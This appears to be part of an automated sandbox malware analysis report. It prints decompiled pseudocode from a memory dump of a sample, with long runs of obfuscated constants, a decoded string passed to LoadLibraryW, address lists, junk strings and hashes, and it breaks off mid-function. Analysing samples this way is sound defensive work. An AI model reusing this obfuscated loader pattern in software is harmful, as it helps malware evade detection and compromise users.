				 *((intOrPtr*)(_t463 - 0x268)) = 0x9ff2789b;
				 *((intOrPtr*)(_t463 - 0x264)) = 0xb5ee5a36;
				 *((intOrPtr*)(_t463 - 0x260)) = 0x8025f2ba;
				 *((intOrPtr*)(_t463 - 0x25c)) = 0xf3c300eb;
				 *((intOrPtr*)(_t463 - 0x258)) = 0x5d0d2b8a;
				 *((intOrPtr*)(_t463 - 0x254)) = 0x6f09a1e9;
				 *((intOrPtr*)(_t463 - 0x250)) = 0xda430b01;
				 *((intOrPtr*)(_t463 - 0x24c)) = 0xc81c23b9;
				 *((intOrPtr*)(_t463 - 0x248)) = 0x8b4f3ac9;
				 *((intOrPtr*)(_t463 - 0x244)) = 0xe8e448f9;
				 *((intOrPtr*)(_t463 - 0x240)) = 0x71ab7e57;
				 *((intOrPtr*)(_t463 - 0x23c)) = 0x365e1ce1;
				 *((intOrPtr*)(_t463 - 0x238)) = 0xec4ce2b5;
				 *((intOrPtr*)(_t463 - 0x234)) = 0xb1697b33;
				 *((intOrPtr*)(_t463 - 0x230)) = 0xd54212f6;
				 *((intOrPtr*)(_t463 - 0x22c)) = 0xb3b8e6f2;
				 *((intOrPtr*)(_t463 - 0x228)) = 0x8dcb06ce;
				 *((intOrPtr*)(_t463 - 0x224)) = 0x2fca0a18;
				 *((intOrPtr*)(_t463 - 0x220)) = 0x4c1ce5f;
				 *((intOrPtr*)(_t463 - 0x21c)) = 0xbde3659e;
				 *((intOrPtr*)(_t463 - 0x218)) = 0x36eced2;
				 *((intOrPtr*)(_t463 - 0x214)) = 0x4ddfb142;
				 *((intOrPtr*)(_t463 - 0x210)) = 0xd6115c70;
				 *((intOrPtr*)(_t463 - 0x20c)) = 0x9da12f2a;
				 *((intOrPtr*)(_t463 - 0x208)) = 0xdadc95be;
				 *((intOrPtr*)(_t463 - 0x204)) = 0x3574398b;
				 *((intOrPtr*)(_t463 - 0x200)) = 0xc1e64aa9;
				 *((intOrPtr*)(_t463 - 0x1fc)) = 0x2f067620;
				 *((intOrPtr*)(_t463 - 0x1f8)) = 0x127d19ca;
				 *((intOrPtr*)(_t463 - 0x1f4)) = 0x31849cb6;
				 *((intOrPtr*)(_t463 - 0x1f0)) = 0xa2873b49;
				 *((intOrPtr*)(_t463 - 0x1ec)) = 0x7af4f8cb;
				 *((intOrPtr*)(_t463 - 0x1e8)) = 0xc99a140b;
				 *((intOrPtr*)(_t463 - 0x1e4)) = 0xd08da1c3;
				 *((intOrPtr*)(_t463 - 0x1e0)) = 0x6bd4d31d;
				 *((intOrPtr*)(_t463 - 0x1dc)) = 0x9c783407;
				 *((intOrPtr*)(_t463 - 0x1d8)) = 0x3b5c6e41;
				 *((intOrPtr*)(_t463 - 0x1d4)) = 0x4745905a;
				 *((intOrPtr*)(_t463 - 0x1d0)) = 0x360d7956;
				 *((intOrPtr*)(_t463 - 0x1cc)) = 0x31e7a990;
				 *((intOrPtr*)(_t463 - 0x1c8)) = 0x22ca18bd;
				 *((intOrPtr*)(_t463 - 0x1c4)) = 0x81a7a290;
				 *((intOrPtr*)(_t463 - 0x1c0)) = 0x52ca4368;
				 *((intOrPtr*)(_t463 - 0x1bc)) = 0x6b0288f2;
				 *((intOrPtr*)(_t463 - 0x1b8)) = 0x6469c6be;
				 *((intOrPtr*)(_t463 - 0x1b4)) = 0xc8699152;
				 *((intOrPtr*)(_t463 - 0x1b0)) = 0x4ccc5a87;
				 *((intOrPtr*)(_t463 - 0x1ac)) = 0xf4b0c619;
				 *((intOrPtr*)(_t463 - 0x1a8)) = 0x36419956;
				 *((intOrPtr*)(_t463 - 0x1a4)) = 0x48c65e2c;
				 *((intOrPtr*)(_t463 - 0x1a0)) = 0x8a727e35;
				 *((intOrPtr*)(_t463 - 0x19c)) = 0x1ec4972;
				 *((intOrPtr*)(_t463 - 0x198)) = 0xa05eb2f8;
				 *((intOrPtr*)(_t463 - 0x194)) = 0x66788d5a;
				 *((intOrPtr*)(_t463 - 0x190)) = 0x56f7265e;
				 *((intOrPtr*)(_t463 - 0x18c)) = 0xda28f248;
				 *((intOrPtr*)(_t463 - 0x188)) = 0xaac23347;
				 *((intOrPtr*)(_t463 - 0x184)) = 0xd1dedcd1;
				 *((intOrPtr*)(_t463 - 0x180)) = 0x4dc26aad;
				 *((intOrPtr*)(_t463 - 0x17c)) = 0x57641d9e;
				 *((intOrPtr*)(_t463 - 0x178)) = 0x2443dfcd;
				 *((intOrPtr*)(_t463 - 0x174)) = 0xb8c01852;
				 *((intOrPtr*)(_t463 - 0x170)) = 0x1c7941fd;
				 *((intOrPtr*)(_t463 - 0x16c)) = 0xcb796a74;
				 *((intOrPtr*)(_t463 - 0x168)) = 0xc28e2e87;
				 *((intOrPtr*)(_t463 - 0x164)) = 0xa45bfb0a;
				 *((intOrPtr*)(_t463 - 0x160)) = 0x7bc0412;
				 *((intOrPtr*)(_t463 - 0x15c)) = 0xd90e0108;
				 *((intOrPtr*)(_t463 - 0x158)) = 0x169acac2;
				 *((intOrPtr*)(_t463 - 0x154)) = 0x300e0d77;
				 *((intOrPtr*)(_t463 - 0x150)) = 0x8e0481c8;
				 *((intOrPtr*)(_t463 - 0x14c)) = 0x5e209984;
				 *((intOrPtr*)(_t463 - 0x148)) = 0xbe02a08b;
				 *((intOrPtr*)(_t463 - 0x144)) = 0xa7a66393;
				 *((intOrPtr*)(_t463 - 0x140)) = 0x8a22029d;
				 *((intOrPtr*)(_t463 - 0x13c)) = 0xbfc8486d;
				 *((intOrPtr*)(_t463 - 0x138)) = 0x781a2d70;
				 *((intOrPtr*)(_t463 - 0x134)) = 0x80b21b5e;
				 *((intOrPtr*)(_t463 - 0x130)) = 0x7441948;
				 *((intOrPtr*)(_t463 - 0x12c)) = 0xd41f7b57;
				 *((intOrPtr*)(_t463 - 0x128)) = 0xe04edfcb;
				 *((intOrPtr*)(_t463 - 0x124)) = 0x87848915;
				 *((intOrPtr*)(_t463 - 0x120)) = 0xa3fe93d0;
				 *((intOrPtr*)(_t463 - 0x11c)) = 0x7b43b7c7;
				 *((intOrPtr*)(_t463 - 0x118)) = 0x71eb1ebe;
				 *((intOrPtr*)(_t463 - 0x114)) = 0x3fc3cf06;
				 *((intOrPtr*)(_t463 - 0x110)) = 0xe099602f;
				 *((intOrPtr*)(_t463 - 0x10c)) = 0xef6eace7;
				 *((intOrPtr*)(_t463 - 0x108)) = 0xfe2f55a3;
				 *((intOrPtr*)(_t463 - 0x104)) = 0x50297237;
				 *((intOrPtr*)(_t463 - 0x100)) = 0x7ab2c6b1;
				 *((intOrPtr*)(_t463 - 0xfc)) = 0xd7712ace;
				 *((intOrPtr*)(_t463 - 0xf8)) = 0x4dfcead3;
				 *((intOrPtr*)(_t463 - 0xf4)) = 0x89bd62f5;
				 *((intOrPtr*)(_t463 - 0xf0)) = 0x43947872;
				 *((intOrPtr*)(_t463 - 0xec)) = 0xafd5e012;
				 *((intOrPtr*)(_t463 - 0xe8)) = 0xcdbfaa54;
				 *((intOrPtr*)(_t463 - 0xe4)) = 0xddbbdc60;
				 *((intOrPtr*)(_t463 - 0xe0)) = 0x7d5aea78;
				 *((intOrPtr*)(_t463 - 0xdc)) = 0xec9116d3;
				 *((intOrPtr*)(_t463 - 0xd8)) = 0xd2ec0453;
				 *((intOrPtr*)(_t463 - 0xd4)) = 0x62656cfd;
				 *((intOrPtr*)(_t463 - 0xd0)) = 0x746b28c7;
				 *((intOrPtr*)(_t463 - 0xcc)) = 0x3d2f2bfd;
				 *((intOrPtr*)(_t463 - 0xc8)) = 0x10f71dd2;
				 *((intOrPtr*)(_t463 - 0xc4)) = 0x7761a633;
				 *((intOrPtr*)(_t463 - 0xc0)) = 0x112310e8;
				 *((intOrPtr*)(_t463 - 0xbc)) = 0x9abef716;
				 *((intOrPtr*)(_t463 - 0xb8)) = 0x210efd2e;
				 *((intOrPtr*)(_t463 - 0xb4)) = 0x54b4385a;
				 *((intOrPtr*)(_t463 - 0xb0)) = 0xc547a5c1;
				 *((intOrPtr*)(_t463 - 0xac)) = 0x8a213ab;
				 *((intOrPtr*)(_t463 - 0xa8)) = 0x260c246d;
				 *((intOrPtr*)(_t463 - 0xa4)) = 0x203e3bea;
				 *((intOrPtr*)(_t463 - 0xa0)) = 0xfa5f14d3;
				 *((intOrPtr*)(_t463 - 0x9c)) = 0xf559ef4b;
				 *((intOrPtr*)(_t463 - 0x98)) = 0x444e4cb4;
				 *((intOrPtr*)(_t463 - 0x94)) = 0x274ccac7;
				 *((intOrPtr*)(_t463 - 0x90)) = 0x11036e68;
				 *((intOrPtr*)(_t463 - 0x8c)) = 0xe0b0320a;
				 *((intOrPtr*)(_t463 - 0x88)) = 0xf6e7f312;
				 *((intOrPtr*)(_t463 - 0x84)) = 0xb116a956;
				 *((intOrPtr*)(_t463 - 0x80)) = 0xd583cb23;
				 *((intOrPtr*)(_t463 - 0x7c)) = 0xf9453082;
				 *((intOrPtr*)(_t463 - 0x78)) = 0xb3e4f498;
				 *((intOrPtr*)(_t463 - 0x74)) = 0x985422;
				 *((intOrPtr*)(_t463 - 0x70)) = 0x1af45694;
				 *((intOrPtr*)(_t463 - 0x6c)) = 0x56bee25f;
				 *((intOrPtr*)(_t463 - 0x68)) = 0x17e0422f;
				 *((intOrPtr*)(_t463 - 0x64)) = 0xae1efe3d;
				 *((intOrPtr*)(_t463 - 0x60)) = 0x4e0fee18;
				 *((intOrPtr*)(_t463 - 0x5c)) = 0x8fb0c196;
				 *((intOrPtr*)(_t463 - 0x58)) = 0x8c574b2b;
				 *((intOrPtr*)(_t463 - 0x54)) = 0xee1ba36b;
				 *((intOrPtr*)(_t463 - 0x50)) = 0xb4450d93;
				 *((intOrPtr*)(_t463 - 0x4c)) = 0x4b9bdf79;
				 *((intOrPtr*)(_t463 - 0x48)) = 0x20e2b4c6;
				 *((intOrPtr*)(_t463 - 0x44)) = 0xa6fe7617;
				 *((intOrPtr*)(_t463 - 0x40)) = 0xce77743f;
				 *((intOrPtr*)(_t463 - 0x3c)) = 0xed2f08ba;
				 *((intOrPtr*)(_t463 - 0x38)) = 0xb7a020b5;
				 *((intOrPtr*)(_t463 - 0x34)) = 0x5049adfa;
				 *((intOrPtr*)(_t463 - 0x30)) = 0x4653483e;
				 *((intOrPtr*)(_t463 - 0x2c)) = 0xf88fc154;
				 *((intOrPtr*)(_t463 - 0x28)) = 0x2170b424;
				 *((intOrPtr*)(_t463 - 0x24)) = 0x97127f63;
				 *((intOrPtr*)(_t463 - 0x20)) = 0x2c72e78b;
				 *((intOrPtr*)(_t463 - 0x1c)) = 0xa4a4af2b;
				 *((intOrPtr*)(_t463 - 0x18)) = 0xa22f88e1;
				 *((intOrPtr*)(_t463 - 0x14)) = 0x26e727d2;
				 *((intOrPtr*)(_t463 - 0x10)) = 0xba3bd70d;
				 *((intOrPtr*)(_t463 - 0xc)) = 0x532c4572;
				 *((intOrPtr*)(_t463 - 8)) = 0x72bb8f8c;
				 *((intOrPtr*)(_t463 - 4)) = 0x92993252;
				_t461 = L002A1D00(0x2b2650, 0x110, _t459);
				 *0x2b7c78 = LoadLibraryW(_t461);
				_t452 = HeapFree(GetProcessHeap(), 0, _t461);
				_t456 =  *0x2b7c78;
				_t462 = 0x1f5c6a;
				if( *0x2b7c78 != 0) {
					goto 0x5a16c5;
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					return L002A1480(_t454, _t456, _t463 - 0x6fc, _t459, _t462);
				} else {
					goto 0x5a16b2;
					return _t452;
				}
			}

0x002a717a
0x002a7184
0x002a718e
0x002a7198
0x002a71a2
0x002a71ac
0x002a71b6
0x002a71c0
0x002a71ca
0x002a71d4
0x002a71de
0x002a71e8
0x002a71f2
0x002a71fc
0x002a7206
0x002a7210
0x002a721a
0x002a7224
0x002a722e
0x002a7238
0x002a7242
0x002a724c
0x002a7256
0x002a7260
0x002a726a
0x002a7274
0x002a727e
0x002a7288
0x002a7292
0x002a729c
0x002a72a6
0x002a72b0
0x002a72ba
0x002a72c4
0x002a72ce
0x002a72d8
0x002a72e2
0x002a72ec
0x002a72f6
0x002a7300
0x002a730a
0x002a7314
0x002a731e
0x002a7328
0x002a7332
0x002a733c
0x002a7346
0x002a7350
0x002a735a
0x002a7364
0x002a736e
0x002a7378
0x002a7382
0x002a738c
0x002a7396
0x002a73a0
0x002a73aa
0x002a73b4
0x002a73be
0x002a73c8
0x002a73d2
0x002a73dc
0x002a73e6
0x002a73f0
0x002a73fa
0x002a7404
0x002a740e
0x002a7418
0x002a7422
0x002a742c
0x002a7436
0x002a7440
0x002a744a
0x002a7454
0x002a745e
0x002a7468
0x002a7472
0x002a747c
0x002a7486
0x002a7490
0x002a749a
0x002a74a4
0x002a74ae
0x002a74b8
0x002a74c2
0x002a74cc
0x002a74d6
0x002a74e0
0x002a74ea
0x002a74f4
0x002a74fe
0x002a7508
0x002a7512
0x002a751c
0x002a7526
0x002a7530
0x002a753a
0x002a7544
0x002a754e
0x002a7558
0x002a7562
0x002a756c
0x002a7576
0x002a7580
0x002a758a
0x002a7594
0x002a759e
0x002a75a8
0x002a75b2
0x002a75bc
0x002a75c6
0x002a75d0
0x002a75da
0x002a75e4
0x002a75ee
0x002a75f8
0x002a7602
0x002a760c
0x002a7616
0x002a7620
0x002a762a
0x002a7634
0x002a763e
0x002a7648
0x002a7652
0x002a765c
0x002a7666
0x002a7670
0x002a767a
0x002a7684
0x002a768e
0x002a7698
0x002a76a2
0x002a76ac
0x002a76b6
0x002a76c0
0x002a76ca
0x002a76d4
0x002a76de
0x002a76e8
0x002a76f2
0x002a76fc
0x002a7706
0x002a7710
0x002a771a
0x002a7724
0x002a772e
0x002a7738
0x002a7742
0x002a774c
0x002a7756
0x002a7760
0x002a776a
0x002a7774
0x002a777e
0x002a7788
0x002a7792
0x002a779c
0x002a77a6
0x002a77b0
0x002a77ba
0x002a77c4
0x002a77ce
0x002a77d8
0x002a77e2
0x002a77ec
0x002a77f6
0x002a7800
0x002a780a
0x002a7814
0x002a781e
0x002a7828
0x002a7832
0x002a783c
0x002a7846
0x002a7850
0x002a785a
0x002a7864
0x002a786e
0x002a7878
0x002a7882
0x002a788c
0x002a7896
0x002a78a0
0x002a78aa
0x002a78b4
0x002a78be
0x002a78c8
0x002a78d2
0x002a78dc
0x002a78e6
0x002a78f0
0x002a78fa
0x002a7904
0x002a790e
0x002a7918
0x002a7922
0x002a792c
0x002a7936
0x002a7940
0x002a794a
0x002a7954
0x002a795e
0x002a7968
0x002a7972
0x002a797c
0x002a7986
0x002a7990
0x002a799a
0x002a79a4
0x002a79ae
0x002a79b8
0x002a79c2
0x002a79cc
0x002a79d6
0x002a79e0
0x002a79ea
0x002a79f4
0x002a79fe
0x002a7a08
0x002a7a12
0x002a7a1c
0x002a7a26
0x002a7a30
0x002a7a3a
0x002a7a44
0x002a7a4e
0x002a7a58
0x002a7a62
0x002a7a6c
0x002a7a76
0x002a7a80
0x002a7a8a
0x002a7a94
0x002a7a9e
0x002a7aa8
0x002a7ab2
0x002a7abc
0x002a7ac6
0x002a7ad0
0x002a7ada
0x002a7ae4
0x002a7aee
0x002a7af8
0x002a7b02
0x002a7b0c
0x002a7b16
0x002a7b20
0x002a7b2a
0x002a7b34
0x002a7b3e
0x002a7b48
0x002a7b52
0x002a7b5c
0x002a7b66
0x002a7b70
0x002a7b7a
0x002a7b84
0x002a7b8e
0x002a7b98
0x002a7ba2
0x002a7bac
0x002a7bb6
0x002a7bc0
0x002a7bca
0x002a7bd4
0x002a7bde
0x002a7be8
0x002a7bf2
0x002a7bfc
0x002a7c06
0x002a7c10
0x002a7c1a
0x002a7c24
0x002a7c2e
0x002a7c38
0x002a7c42
0x002a7c4c
0x002a7c56
0x002a7c60
0x002a7c6a
0x002a7c74
0x002a7c7e
0x002a7c88
0x002a7c92
0x002a7c9c
0x002a7ca6
0x002a7cb0
0x002a7cba
0x002a7cc4
0x002a7cce
0x002a7cd8
0x002a7ce2
0x002a7cec
0x002a7cf6
0x002a7d00
0x002a7d0a
0x002a7d14
0x002a7d1e
0x002a7d28
0x002a7d32
0x002a7d3c
0x002a7d46
0x002a7d50
0x002a7d5a
0x002a7d64
0x002a7d6e
0x002a7d78
0x002a7d82
0x002a7d8c
0x002a7d96
0x002a7da0
0x002a7daa
0x002a7db4
0x002a7dbe
0x002a7dc8
0x002a7dd2
0x002a7ddc
0x002a7de6
0x002a7df0
0x002a7dfa
0x002a7e04
0x002a7e0e
0x002a7e18
0x002a7e22
0x002a7e2c
0x002a7e36
0x002a7e40
0x002a7e4a
0x002a7e54
0x002a7e5e
0x002a7e68
0x002a7e72
0x002a7e7c
0x002a7e86
0x002a7e90
0x002a7e9a
0x002a7ea4
0x002a7eae
0x002a7eb8
0x002a7ec2
0x002a7ecc
0x002a7ed6
0x002a7ee0
0x002a7eea
0x002a7ef4
0x002a7efe
0x002a7f08
0x002a7f12
0x002a7f1c
0x002a7f26
0x002a7f30
0x002a7f3a
0x002a7f44
0x002a7f4e
0x002a7f58
0x002a7f62
0x002a7f6c
0x002a7f76
0x002a7f80
0x002a7f8a
0x002a7f94
0x002a7f9e
0x002a7fa8
0x002a7fb2
0x002a7fbc
0x002a7fc6
0x002a7fd0
0x002a7fda
0x002a7fe4
0x002a7fee
0x002a7ff8
0x002a8002
0x002a800c
0x002a8016
0x002a8020
0x002a802a
0x002a8034
0x002a803e
0x002a8048
0x002a8052
0x002a805c
0x002a8066
0x002a8070
0x002a807a
0x002a8084
0x002a808e
0x002a8098
0x002a80a2
0x002a80ac
0x002a80b6
0x002a80c0
0x002a80ca
0x002a80d4
0x002a80de
0x002a80e8
0x002a80f2
0x002a80fc
0x002a8106
0x002a8110
0x002a811a
0x002a8124
0x002a812e
0x002a8138
0x002a814c
0x002a815b
0x002a8165
0x002a816f
0x002a8179
0x002a8183
0x002a818d
0x002a8197
0x002a81a1
0x002a81ab
0x002a81b5
0x002a81bf
0x002a81c6
0x002a81cd
0x002a81d4
0x002a81db
0x002a81e2
0x002a81e9
0x002a81f0
0x002a81f7
0x002a81fe
0x002a8205
0x002a820c
0x002a8213
0x002a821a
0x002a8221
0x002a8228
0x002a822f
0x002a8236
0x002a823d
0x002a8244
0x002a824b
0x002a8252
0x002a8259
0x002a8260
0x002a8267
0x002a826e
0x002a8275
0x002a827c
0x002a8283
0x002a828a
0x002a8291
0x002a8298
0x002a82a7
0x002a82b3
0x002a82bf
0x002a82c5
0x002a82cb
0x002a82ce
0x002a82d6
0x002a82db
0x002a82dc
0x002a82dd
0x002a82de
0x002a82df
0x002a82e0
0x002a82e1
0x002a82e2
0x002a82e3
0x002a82e4
0x002a82f6
0x002a82d0
0x002a82d0
0x002a82d5
0x002a82d5

APIs

LoadLibraryW.KERNEL32(00000000), ref: 002A82AA
GetProcessHeap.KERNEL32(00000000,00000000), ref: 002A82B8
HeapFree.KERNEL32(00000000), ref: 002A82BF

Strings

_5S, xrefs: 002A7378
,W<B, xrefs: 002A79FE
rE,S, xrefs: 002A828A
An\;, xrefs: 002A7E54
P+"V, xrefs: 002A747C
7r)P, xrefs: 002A8066
, ?|, xrefs: 002A7594
Mr-J, xrefs: 002A7184
;> , xrefs: 002A8165
>HSF, xrefs: 002A824B
ZGK~, xrefs: 002A794A
*U I, xrefs: 002A7B20
V@%, xrefs: 002A79EA
S#w7, xrefs: 002A7210
fsI, xrefs: 002A7620
Vy6, xrefs: 002A7E68
Xe:, xrefs: 002A7A44
xZ}, xrefs: 002A80C0
]vFu, xrefs: 002A75E4
P&+, xrefs: 002A8156

Memory Dump Source

Source File: 00000008.00000002.1686365034.002A1000.00000020.sdmp, Offset: 002A0000, based on PE: true

Associated: 00000008.00000002.1686360890.002A0000.00000004.sdmp Download File
Associated: 00000008.00000002.1686374589.002B1000.00000002.sdmp Download File
Associated: 00000008.00000002.1686378808.002B2000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2a0000_startedradar.jbxd

Similarity

API ID: Heap$FreeLibraryLoadProcess
String ID: Xe:$*U I$, ?|$,W<B$7r)P$>HSF$An\;$Mr-J$P&+$P+"V$S#w7$Vy6$ZGK~$]vFu$_5S$fsI$rE,S$xZ}$;> $V@%
API String ID: 872250060-4258213912
Opcode ID: e181cef960b67d3729d7311dd008e82ac3cc1b2ce1c914a830aa0d783e32bcc3
Instruction ID: 6c0cc91bda9966ba4e3308666a650f739e2d0e36da9419c4dae56926c679ee02
Opcode Fuzzy Hash: e181cef960b67d3729d7311dd008e82ac3cc1b2ce1c914a830aa0d783e32bcc3
Instruction Fuzzy Hash: 1F8294F48467698FDB618F429E8468EBA75FB52305F6086C8C25D3B214CB750BD2CF89

Uniqueness

Uniqueness Score: 100.00%

Function 002A8B2A, Relevance: 23.0, APIs: 3, Strings: 10, Instructions: 288
memorylibraryUNIQUE

C-Code - Quality: 95%

			E002A8B2A(void* __esi, void* __eflags) {
				int _t273;
				void* _t275;
				void* _t280;
				void* _t282;
				void* _t283;
				void* _t284;

				 *((intOrPtr*)(_t284 - 0x430)) = 0xaf709e67;
				 *((intOrPtr*)(_t284 - 0x42c)) = 0x1163a71d;
				 *((intOrPtr*)(_t284 - 0x428)) = 0x4e215be2;
				 *((intOrPtr*)(_t284 - 0x424)) = 0x19bceaf9;
				 *((intOrPtr*)(_t284 - 0x420)) = 0xa91d265;
				 *((intOrPtr*)(_t284 - 0x41c)) = 0xf82a1363;
				 *((intOrPtr*)(_t284 - 0x418)) = 0x6e808938;
				 *((intOrPtr*)(_t284 - 0x414)) = 0x98c7da5c;
				 *((intOrPtr*)(_t284 - 0x410)) = 0xc8adebec;
				 *((intOrPtr*)(_t284 - 0x40c)) = 0x77677182;
				 *((intOrPtr*)(_t284 - 0x408)) = 0xc11d7675;
				 *((intOrPtr*)(_t284 - 0x404)) = 0xa0508401;
				 *((intOrPtr*)(_t284 - 0x400)) = 0x876a05d6;
				 *((intOrPtr*)(_t284 - 0x3fc)) = 0x9081f2c7;
				 *((intOrPtr*)(_t284 - 0x3f8)) = 0xc48e2074;
				 *((intOrPtr*)(_t284 - 0x3f4)) = 0x7807f188;
				 *((intOrPtr*)(_t284 - 0x3f0)) = 0x4fcdd0e;
				 *((intOrPtr*)(_t284 - 0x3ec)) = 0x881b8662;
				 *((intOrPtr*)(_t284 - 0x3e8)) = 0x1a3292c8;
				 *((intOrPtr*)(_t284 - 0x3e4)) = 0x1b6da59f;
				 *((intOrPtr*)(_t284 - 0x3e0)) = 0x6b28c3db;
				 *((intOrPtr*)(_t284 - 0x3dc)) = 0xda448878;
				 *((intOrPtr*)(_t284 - 0x3d8)) = 0x5a5cda93;
				 *((intOrPtr*)(_t284 - 0x3d4)) = 0x357254a9;
				 *((intOrPtr*)(_t284 - 0x3d0)) = 0xf5d47e7f;
				 *((intOrPtr*)(_t284 - 0x3cc)) = 0x73f8b64e;
				 *((intOrPtr*)(_t284 - 0x3c8)) = 0xb2e97c98;
				 *((intOrPtr*)(_t284 - 0x3c4)) = 0x3a85e2c1;
				 *((intOrPtr*)(_t284 - 0x3c0)) = 0x3178e38c;
				 *((intOrPtr*)(_t284 - 0x3bc)) = 0x3cef46f6;
				 *((intOrPtr*)(_t284 - 0x3b8)) = 0x10bc6fd5;
				 *((intOrPtr*)(_t284 - 0x3b4)) = 0x7141317;
				 *((intOrPtr*)(_t284 - 0x3b0)) = 0x1cb45dfe;
				 *((intOrPtr*)(_t284 - 0x3ac)) = 0x84231081;
				 *((intOrPtr*)(_t284 - 0x3a8)) = 0x30e76b09;
				 *((intOrPtr*)(_t284 - 0x3a4)) = 0x4d4fc90a;
				 *((intOrPtr*)(_t284 - 0x3a0)) = 0xca1ab3fd;
				 *((intOrPtr*)(_t284 - 0x39c)) = 0xede0e45a;
				 *((intOrPtr*)(_t284 - 0x398)) = 0x6be617d1;
				 *((intOrPtr*)(_t284 - 0x394)) = 0x97395634;
				 *((intOrPtr*)(_t284 - 0x390)) = 0xdc008303;
				 *((intOrPtr*)(_t284 - 0x38c)) = 0x1bbe291a;
				 *((intOrPtr*)(_t284 - 0x388)) = 0x1fa131f2;
				 *((intOrPtr*)(_t284 - 0x384)) = 0x65258f83;
				 *((intOrPtr*)(_t284 - 0x380)) = 0xbbfc5afb;
				 *((intOrPtr*)(_t284 - 0x37c)) = 0x4f70604d;
				 *((intOrPtr*)(_t284 - 0x378)) = 0x7edeb9fa;
				 *((intOrPtr*)(_t284 - 0x374)) = 0x97c728ef;
				 *((intOrPtr*)(_t284 - 0x370)) = 0x38cb8d38;
				 *((intOrPtr*)(_t284 - 0x36c)) = 0x286c3af9;
				 *((intOrPtr*)(_t284 - 0x368)) = 0xb3aff7af;
				 *((intOrPtr*)(_t284 - 0x364)) = 0x17cf560a;
				 *((intOrPtr*)(_t284 - 0x360)) = 0xcdcd756e;
				 *((intOrPtr*)(_t284 - 0x35c)) = 0x1ac03899;
				 *((intOrPtr*)(_t284 - 0x358)) = 0xd1ed7e7;
				 *((intOrPtr*)(_t284 - 0x354)) = 0x6a58d108;
				 *((intOrPtr*)(_t284 - 0x350)) = 0x70baf019;
				 *((intOrPtr*)(_t284 - 0x34c)) = 0x1f190eb1;
				 *((intOrPtr*)(_t284 - 0x348)) = 0x7d6ac9a2;
				 *((intOrPtr*)(_t284 - 0x344)) = 0x6eb46f28;
				 *((intOrPtr*)(_t284 - 0x340)) = 0xea7053fc;
				 *((intOrPtr*)(_t284 - 0x33c)) = 0x16086f74;
				 *((intOrPtr*)(_t284 - 0x338)) = 0xb36bf086;
				 *((intOrPtr*)(_t284 - 0x334)) = 0x9919b3ce;
				 *((intOrPtr*)(_t284 - 0x330)) = 0x73c7d9e8;
				 *((intOrPtr*)(_t284 - 0x32c)) = 0xb9e9eac7;
				 *((intOrPtr*)(_t284 - 0x328)) = 0x7a2806a8;
				 *((intOrPtr*)(_t284 - 0x324)) = 0x5ff66e76;
				 *((intOrPtr*)(_t284 - 0x320)) = 0xb4aeb549;
				 *((intOrPtr*)(_t284 - 0x31c)) = 0xc7b18370;
				 *((intOrPtr*)(_t284 - 0x318)) = 0x51c87220;
				 *((intOrPtr*)(_t284 - 0x314)) = 0xa2573e1;
				 *((intOrPtr*)(_t284 - 0x310)) = 0x5244303c;
				 *((intOrPtr*)(_t284 - 0x30c)) = 0x6ac6cac3;
				 *((intOrPtr*)(_t284 - 0x308)) = 0xbb2d84a9;
				 *((intOrPtr*)(_t284 - 0x304)) = 0x5275873c;
				 *((intOrPtr*)(_t284 - 0x300)) = 0xa6de334d;
				 *((intOrPtr*)(_t284 - 0x2fc)) = 0xf528764d;
				 *((intOrPtr*)(_t284 - 0x2f8)) = 0x53a5b803;
				 *((intOrPtr*)(_t284 - 0x2f4)) = 0xe7d9fd2e;
				 *((intOrPtr*)(_t284 - 0x2f0)) = 0xd1cf7bc1;
				 *((intOrPtr*)(_t284 - 0x2ec)) = 0x716bc8ea;
				 *((intOrPtr*)(_t284 - 0x2e8)) = 0xa86e2fa5;
				 *((intOrPtr*)(_t284 - 0x2e4)) = 0xb485810b;
				 *((intOrPtr*)(_t284 - 0x2e0)) = 0x14fa3a6;
				 *((intOrPtr*)(_t284 - 0x2dc)) = 0x703ab5a7;
				 *((intOrPtr*)(_t284 - 0x2d8)) = 0x836b3e3f;
				 *((intOrPtr*)(_t284 - 0x2d4)) = 0xde047161;
				 *((intOrPtr*)(_t284 - 0x2d0)) = 0xad4662ab;
				 *((intOrPtr*)(_t284 - 0x2cc)) = 0x146f4fdf;
				 *((intOrPtr*)(_t284 - 0x2c8)) = 0xcacf051e;
				 *((intOrPtr*)(_t284 - 0x2c4)) = 0x4c4ec529;
				 *((intOrPtr*)(_t284 - 0x2c0)) = 0x65d4fb8;
				 *((intOrPtr*)(_t284 - 0x2bc)) = 0x585efb5d;
				 *((intOrPtr*)(_t284 - 0x2b8)) = 0x8814d895;
				 *((intOrPtr*)(_t284 - 0x2b4)) = 0xdb36feaa;
				 *((intOrPtr*)(_t284 - 0x2b0)) = 0x42a7509b;
				 *((intOrPtr*)(_t284 - 0x2ac)) = 0x50f2cfee;
				 *((intOrPtr*)(_t284 - 0x2a8)) = 0x7949fb0e;
				 *((intOrPtr*)(_t284 - 0x2a4)) = 0x3c4576fa;
				 *((intOrPtr*)(_t284 - 0x2a0)) = 0x104dc731;
				 *((intOrPtr*)(_t284 - 0x29c)) = 0x4f579a08;
				 *((intOrPtr*)(_t284 - 0x298)) = 0x49ef92cf;
				 *((intOrPtr*)(_t284 - 0x294)) = 0x591d935f;
				 *((intOrPtr*)(_t284 - 0x290)) = 0x4b44cf8;
				 *((intOrPtr*)(_t284 - 0x28c)) = 0x87631a53;
				 *((intOrPtr*)(_t284 - 0x288)) = 0x28518c37;
				 *((intOrPtr*)(_t284 - 0x284)) = 0xe1b72a74;
				 *((intOrPtr*)(_t284 - 0x280)) = 0xd1cb6f5c;
				 *((intOrPtr*)(_t284 - 0x27c)) = 0xf48436d8;
				 *((intOrPtr*)(_t284 - 0x278)) = 0x81307b06;
				 *((intOrPtr*)(_t284 - 0x274)) = 0xe03d9e96;
				 *((intOrPtr*)(_t284 - 0x270)) = 0x5b40c1bf;
				 *((intOrPtr*)(_t284 - 0x26c)) = 0x683da5f7;
				 *((intOrPtr*)(_t284 - 0x268)) = 0xc5dacac8;
				 *((intOrPtr*)(_t284 - 0x264)) = 0xe7e5f0f1;
				 *((intOrPtr*)(_t284 - 0x260)) = 0xb332d9fa;
				 *((intOrPtr*)(_t284 - 0x25c)) = 0x6870953f;
				 *((intOrPtr*)(_t284 - 0x258)) = 0x783f7efa;
				 *((intOrPtr*)(_t284 - 0x254)) = 0xae4fa740;
